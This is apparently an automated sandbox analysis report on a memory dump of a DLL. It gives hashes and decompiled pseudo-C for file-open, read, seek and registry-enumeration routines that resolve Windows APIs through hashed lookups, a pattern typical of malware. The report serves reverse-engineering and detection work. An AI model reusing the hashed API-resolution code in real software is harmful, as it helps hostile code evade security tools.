                                                                                                                                                  0x6e9b5ba1
                                                                                                                                                  0x6e9b5bb1
                                                                                                                                                  0x6e9b5bb1

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 098d50a50726e11323e3b69eece24cf5d9e57dfae2ceeb03cbcd324d8e17a096
                                                                                                                                                  • Instruction ID: 0594d4adba43bdef2dab1203b5f5a2585654248634b25672f0789a4952a3db8c
                                                                                                                                                  • Opcode Fuzzy Hash: 098d50a50726e11323e3b69eece24cf5d9e57dfae2ceeb03cbcd324d8e17a096
                                                                                                                                                  • Instruction Fuzzy Hash: 52310430284309BFEB516AF98D89F6B769FDFD1648F004C38FA419A185DE71D804CE61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E6E9B5BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                                  				void* _t7;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				long _t23;
                                                                                                                                                  				WCHAR** _t24;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				intOrPtr* _t33;
                                                                                                                                                  				WCHAR** _t34;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				long _t39;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  
                                                                                                                                                  				_t34 = __edi;
                                                                                                                                                  				_t31 = 5;
                                                                                                                                                  				_t38 = 2;
                                                                                                                                                  				_t39 =  !=  ? _t31 : _t38;
                                                                                                                                                  				if(__ebx != 2) {
                                                                                                                                                  					_t7 = 3;
                                                                                                                                                  					_t22 = 0;
                                                                                                                                                  					_t23 =  ==  ? _t7 : _t22;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t23 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
                                                                                                                                                  					_push(_t20);
                                                                                                                                                  				}
                                                                                                                                                  				_t24 =  &(_t34[3]);
                                                                                                                                                  				E6E9AC26C(_t24);
                                                                                                                                                  				if(E6E9AC280(_t24) != 0) {
                                                                                                                                                  					_t34[2] = E6E9B35F0(0xc0000000);
                                                                                                                                                  					_t12 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
                                                                                                                                                  						_t33 = E6E9B3064(0x8e844d1e, 0xba53868);
                                                                                                                                                  						if(_t33 != 0) {
                                                                                                                                                  							 *_t33( *_t24, 0, 0, 2);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t41 = _t42 + 8;
                                                                                                                                                  					E6E9B3698(_t41, 0xff, 8);
                                                                                                                                                  					_t42 = _t42 + 0xc;
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                                                                  						_push(_t41);
                                                                                                                                                  						_push(_t41);
                                                                                                                                                  						_push(0);
                                                                                                                                                  						_push( *_t24);
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						asm("int3");
                                                                                                                                                  					}
                                                                                                                                                  					_t12 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t12;
                                                                                                                                                  			}

















                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                                                                  • Instruction ID: 4f1b675ceec01bb9387b7bc3e9716c384e7cd3361713cef68be25982740e5ae7
                                                                                                                                                  • Opcode Fuzzy Hash: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                                                                  • Instruction Fuzzy Hash: F801223128030ABBFB5166E98C09F7B738FCFC2658F008835BA01A9185DA32E8558920
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E6E9B5BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                                  				void* _t7;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				long _t23;
                                                                                                                                                  				WCHAR** _t24;
                                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                                  				WCHAR** _t33;
                                                                                                                                                  				long _t37;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  
                                                                                                                                                  				_t33 = __edi;
                                                                                                                                                  				if(__edx != 0) {
                                                                                                                                                  					_t37 = 3;
                                                                                                                                                  					if(_t21 != 2) {
                                                                                                                                                  						_t7 = 3;
                                                                                                                                                  						_t22 = 0;
                                                                                                                                                  						_t23 =  ==  ? _t7 : _t22;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t23 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                                                                  						_push(0);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
                                                                                                                                                  						_push(_t20);
                                                                                                                                                  					}
                                                                                                                                                  					_t24 =  &(_t33[3]);
                                                                                                                                                  					E6E9AC26C(_t24);
                                                                                                                                                  					if(E6E9AC280(_t24) != 0) {
                                                                                                                                                  						_t33[2] = E6E9B35F0(0x80000000);
                                                                                                                                                  						_t12 = 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
                                                                                                                                                  							_t32 = E6E9B3064(0x8e844d1e, 0xba53868);
                                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                                  								 *_t32( *_t24, 0, 0, 2);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t39 = _t40 + 8;
                                                                                                                                                  						E6E9B3698(_t39, 0xff, 8);
                                                                                                                                                  						_t40 = _t40 + 0xc;
                                                                                                                                                  						if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                                                                  							_push(_t39);
                                                                                                                                                  							_push(_t39);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push( *_t24);
                                                                                                                                                  							asm("int3");
                                                                                                                                                  							asm("int3");
                                                                                                                                                  						}
                                                                                                                                                  						_t12 = 1;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					__edi[2] = 2;
                                                                                                                                                  					_t12 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				return _t12;
                                                                                                                                                  			}
















                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                                                                  • Instruction ID: 1aae744b006aea8d2494b2c9a5ec4e0ea9e5fbb0877b0a263235d52aa372c4e3
                                                                                                                                                  • Opcode Fuzzy Hash: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                                                                  • Instruction Fuzzy Hash: 9001263068420ABAF7915AF5CC49F6B774FDFC2648F008C35BA0195189DB72E858CA20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E6E9B5BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                                  				void* _t7;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				long _t23;
                                                                                                                                                  				WCHAR** _t24;
                                                                                                                                                  				intOrPtr* _t33;
                                                                                                                                                  				WCHAR** _t34;
                                                                                                                                                  				long _t38;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  
                                                                                                                                                  				_t34 = __edi;
                                                                                                                                                  				_t38 = 2;
                                                                                                                                                  				asm("adc ebp, 0x0");
                                                                                                                                                  				if(__ebx != 2) {
                                                                                                                                                  					_t7 = 3;
                                                                                                                                                  					_t22 = 0;
                                                                                                                                                  					_t23 =  ==  ? _t7 : _t22;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t23 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
                                                                                                                                                  					_push(_t20);
                                                                                                                                                  				}
                                                                                                                                                  				_t24 =  &(_t34[3]);
                                                                                                                                                  				E6E9AC26C(_t24);
                                                                                                                                                  				if(E6E9AC280(_t24) != 0) {
                                                                                                                                                  					_t34[2] = E6E9B35F0(0xc0000000);
                                                                                                                                                  					_t12 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
                                                                                                                                                  						_t33 = E6E9B3064(0x8e844d1e, 0xba53868);
                                                                                                                                                  						if(_t33 != 0) {
                                                                                                                                                  							 *_t33( *_t24, 0, 0, 2);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t40 = _t41 + 8;
                                                                                                                                                  					E6E9B3698(_t40, 0xff, 8);
                                                                                                                                                  					_t41 = _t41 + 0xc;
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                                                                  						_push(_t40);
                                                                                                                                                  						_push(_t40);
                                                                                                                                                  						_push(0);
                                                                                                                                                  						_push( *_t24);
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						asm("int3");
                                                                                                                                                  					}
                                                                                                                                                  					_t12 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t12;
                                                                                                                                                  			}














                                                                                                                                                  0x6e9b5c72
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c9a

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                                                                  • Instruction ID: 510c5993851073c7f9c676808a77fe4618c6a8fe2894b04da95846a67da4d0ae
                                                                                                                                                  • Opcode Fuzzy Hash: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                                                                  • Instruction Fuzzy Hash: 0901283568020ABBF751A6F58D45F7B724FDFD2658F008835FA01951C9DE32E859CA21
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                  			E6E9B5BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				long _t22;
                                                                                                                                                  				WCHAR** _t23;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  				WCHAR** _t31;
                                                                                                                                                  				long _t35;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  
                                                                                                                                                  				_t31 = __edi;
                                                                                                                                                  				_t35 = 3;
                                                                                                                                                  				if(__ebx != 2) {
                                                                                                                                                  					_t6 = 3;
                                                                                                                                                  					_t21 = 0;
                                                                                                                                                  					_t22 =  ==  ? _t6 : _t21;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t22 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
                                                                                                                                                  					_push(_t19);
                                                                                                                                                  				}
                                                                                                                                                  				_t23 =  &(_t31[3]);
                                                                                                                                                  				E6E9AC26C(_t23);
                                                                                                                                                  				if(E6E9AC280(_t23) != 0) {
                                                                                                                                                  					_t31[2] = E6E9B35F0(0x100);
                                                                                                                                                  					_t11 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
                                                                                                                                                  						_t30 = E6E9B3064(0x8e844d1e, 0xba53868);
                                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                                  							 *_t30( *_t23, 0, 0, 2);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t37 = _t38 + 8;
                                                                                                                                                  					E6E9B3698(_t37, 0xff, 8);
                                                                                                                                                  					_t38 = _t38 + 0xc;
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                                                                  						_push(_t37);
                                                                                                                                                  						_push(_t37);
                                                                                                                                                  						_push(0);
                                                                                                                                                  						_push( *_t23);
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						asm("int3");
                                                                                                                                                  					}
                                                                                                                                                  					_t11 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}















                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                                                                  • Instruction ID: 833d13a2fd19232a52afc2d24a2860e6464b801a46ba4dc4c316f1fb3fcef2f8
                                                                                                                                                  • Opcode Fuzzy Hash: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                                                                  • Instruction Fuzzy Hash: 4E01243168020ABBFB91AAF58C45FBB724FCFD2658F004835BA01A5189DE32E854CA20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                  			E6E9B5C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				long _t22;
                                                                                                                                                  				WCHAR** _t23;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  				WCHAR** _t31;
                                                                                                                                                  				long _t35;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  
                                                                                                                                                  				_t31 = __edi;
                                                                                                                                                  				_t35 = 3;
                                                                                                                                                  				if(__ebx != 2) {
                                                                                                                                                  					_t6 = 3;
                                                                                                                                                  					_t21 = 0;
                                                                                                                                                  					_t22 =  ==  ? _t6 : _t21;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t22 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
                                                                                                                                                  					_push(_t19);
                                                                                                                                                  				}
                                                                                                                                                  				_t23 =  &(_t31[3]);
                                                                                                                                                  				E6E9AC26C(_t23);
                                                                                                                                                  				if(E6E9AC280(_t23) != 0) {
                                                                                                                                                  					_t31[2] = E6E9B35F0(0);
                                                                                                                                                  					_t11 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
                                                                                                                                                  						_t30 = E6E9B3064(0x8e844d1e, 0xba53868);
                                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                                  							 *_t30( *_t23, 0, 0, 2);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t37 = _t38 + 8;
                                                                                                                                                  					E6E9B3698(_t37, 0xff, 8);
                                                                                                                                                  					_t38 = _t38 + 0xc;
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                                                                  						_push(_t37);
                                                                                                                                                  						_push(_t37);
                                                                                                                                                  						_push(0);
                                                                                                                                                  						_push( *_t23);
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						asm("int3");
                                                                                                                                                  					}
                                                                                                                                                  					_t11 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}















                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E6E9B5E10(void* __ecx, intOrPtr _a4) {
                                                                                                                                                  				long _v16;
                                                                                                                                                  				long _t4;
                                                                                                                                                  				void* _t8;
                                                                                                                                                  				void** _t9;
                                                                                                                                                  				intOrPtr _t17;
                                                                                                                                                  				long* _t18;
                                                                                                                                                  
                                                                                                                                                  				_push(_t16);
                                                                                                                                                  				_t8 = __ecx;
                                                                                                                                                  				_t17 = _a4;
                                                                                                                                                  				if(_t17 != 0) {
                                                                                                                                                  					asm("pxor xmm0, xmm0");
                                                                                                                                                  					asm("movq [esi], xmm0");
                                                                                                                                                  				}
                                                                                                                                                  				_t9 = _t8 + 0xc;
                                                                                                                                                  				if(E6E9AC280(_t9) != 0) {
                                                                                                                                                  					L7:
                                                                                                                                                  					_t4 = 0;
                                                                                                                                                  					goto L10;
                                                                                                                                                  				} else {
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0xba53868) == 0) {
                                                                                                                                                  						_t4 = 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
                                                                                                                                                  					}
                                                                                                                                                  					if(_t4 != 0xffffffff) {
                                                                                                                                                  						if(_t17 != 0) {
                                                                                                                                                  							 *_t18 = _t4;
                                                                                                                                                  							asm("movq xmm0, [esp]");
                                                                                                                                                  							asm("movq [esi], xmm0");
                                                                                                                                                  						}
                                                                                                                                                  						L10:
                                                                                                                                                  						return _t4;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L7;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}










                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E9B5D48,?,?), ref: 6E9B5E5C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9B5E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
                                                                                                                                                  				long _v12;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				long _t9;
                                                                                                                                                  				long _t10;
                                                                                                                                                  				int _t12;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				void** _t19;
                                                                                                                                                  				DWORD* _t20;
                                                                                                                                                  
                                                                                                                                                  				_t18 = __ecx;
                                                                                                                                                  				_t19 = __ecx + 0xc;
                                                                                                                                                  				if(E6E9AC280(_t19) == 0) {
                                                                                                                                                  					_v12 = _a8;
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0xed3ed1cc) == 0) {
                                                                                                                                                  						_t9 = 0x7f;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
                                                                                                                                                  						if(_t12 == 0) {
                                                                                                                                                  							_t9 = E6E9B35F0(_t18);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t9 = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					 *((intOrPtr*)(_t18 + 8)) = _t9;
                                                                                                                                                  					if(_t9 == 0) {
                                                                                                                                                  						_t10 = _v12;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t10 = 0;
                                                                                                                                                  						_v12 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t10 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				return _t10;
                                                                                                                                                  			}












                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E9B5D79,00000000,?,00000000,?), ref: 6E9B5EC8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9B564C(void* __ecx) {
                                                                                                                                                  				long _t9;
                                                                                                                                                  				char* _t11;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				int _t17;
                                                                                                                                                  				int _t18;
                                                                                                                                                  				int* _t19;
                                                                                                                                                  
                                                                                                                                                  				_t18 = 0;
                                                                                                                                                  				_t17 = _t19[0x48];
                                                                                                                                                  				_t16 = __ecx;
                                                                                                                                                  				_t11 =  &(_t19[1]);
                                                                                                                                                  				 *_t17 = 0;
                                                                                                                                                  				 *((intOrPtr*)(_t17 + 4)) = 0;
                                                                                                                                                  				 *((intOrPtr*)(_t17 + 8)) = 0;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					 *_t19 = 0x105;
                                                                                                                                                  					if(E6E9B3064(0x150c05fc, 0xed2313f7) == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					}
                                                                                                                                                  					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
                                                                                                                                                  					if(_t9 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					}
                                                                                                                                                  					return _t17;
                                                                                                                                                  					L4:
                                                                                                                                                  					E6E9AE644(_t17, _t11,  *_t17);
                                                                                                                                                  					_t18 = _t18 + 1;
                                                                                                                                                  				}
                                                                                                                                                  			}










                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E9B5698
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
